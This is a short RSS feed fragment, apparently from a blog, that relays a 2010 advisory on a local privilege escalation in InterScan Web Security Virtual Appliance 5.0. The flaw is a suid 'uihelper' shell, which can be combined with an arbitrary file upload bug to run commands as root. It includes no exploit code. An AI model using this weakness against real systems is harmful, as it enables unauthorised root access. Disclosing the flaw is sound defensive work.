InterScan Web Security Virtual Appliance has a shell called “uihelper” that has suid bit on. So it could be possible to execute commands as root. Also using the vulnerability “Arbitrary File Upload” remote commands could be run as root.</p>
<p>http://www.exploit-db.com/sploits/cybsec_advisory_2010_0604_InterScan_Web_Security_5_0_Local_Privilege_Escalation.pdf</p>
]]></content:encoded>
			<wfw:commentRss>http://mild-info.com/2010/06/local-privilege-escalation-in-interscan-web-security-virtual.php/feed</wfw:commentRss>
		</item>
	</channel>
</rss>
